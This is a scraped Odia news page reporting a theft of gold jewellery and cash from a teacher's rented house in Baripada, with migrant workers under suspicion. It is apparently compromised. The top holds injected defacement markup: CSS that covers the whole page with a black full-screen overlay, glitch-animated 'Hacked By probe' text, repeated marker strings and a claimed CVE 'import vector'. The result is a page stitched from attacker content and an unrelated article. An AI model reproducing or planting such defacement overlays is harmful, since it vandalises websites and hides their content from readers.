html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMP4RL9UXPK
`58; Hacked By probe `68;
[ HXIMP4rl9uxpk ]
HXIMP4rl9uxpk
CVE-2026-49049 | import vector

ଶିକ୍ଷୟିତ୍ରୀଙ୍କ ଭଡ଼ାଘରୁ ଲକ୍ଷାଧିକ ଟଙ୍କାର ସୁନା ଗହଣା ଚୋରୀ

User Rating: 0 / 5

Star InactiveStar InactiveStar InactiveStar InactiveStar Inactive
 

ମୁର୍ଶିଦାବାଦ ଶ୍ରମିକଙ୍କ ସଂପୃକ୍ତି ସନ୍ଦେହ

ବାରିପଦା/ ଦିଲ୍ଲୀପ ମହାନ୍ତି : ବାରିପଦା ସଦର ଥାନା ଅନ୍ତର୍ଗତ ସିରିଷବଣୀସ୍ଥିତ ଶିକ୍ଷୟିତ୍ରୀ ଛବିଲତା ବାରିକଙ୍କ ଭଡ଼ା ଘରୁ ସନ୍ଧ୍ୟା ୬ରୁ ସାଢ଼େ ୬ ମଧ୍ୟରେ ଲକ୍ଷାଧିକ ଟଙ୍କାର ସୁନାଗହଣା ସହିତ ନଗଦ ୪୦ହଜାର ଟଙ୍କା ଏବଂ ଶିବ ମନ୍ଦିର ପାଇଁ ରଖାଯାଇଥିବା ପ୍ରାୟ ୩୦-୪୦ହଜାର ଟଙ୍କାର ଖୁଚୁରା ଟଙ୍କା ଚୋରୀ ହୋଇଛି। ଗତକାଲି ଏହି ଘଟଣା ଘଟିଛି। ଏନେଇ ଛବିଲତା ସଦର ଥାନାରେ ଅଭିଯୋଗ କରିଛନ୍ତି। ପୁଲିସ ଓ ସାଇଣ୍ଟିଫିକ୍ ଟିମ୍ ସହିତ ଘଟଣାସ୍ଥଳରେ ପହଞ୍ଚି ତଦନ୍ତ କରିଛି। ଏହି ଚୋରୀରେ ମୁର୍ଶିଦାବାଦରୁ ଆସି ଏଠାରେ ରହୁଥିବା ଶ୍ରମିକ ଏବଂ ମିସ୍ତ୍ରୀଙ୍କ ସଂପୃକ୍ତି ଥିବା ସନ୍ଦେହ କରାଯାଉଛି। 

 

0
0
0
s2sdefault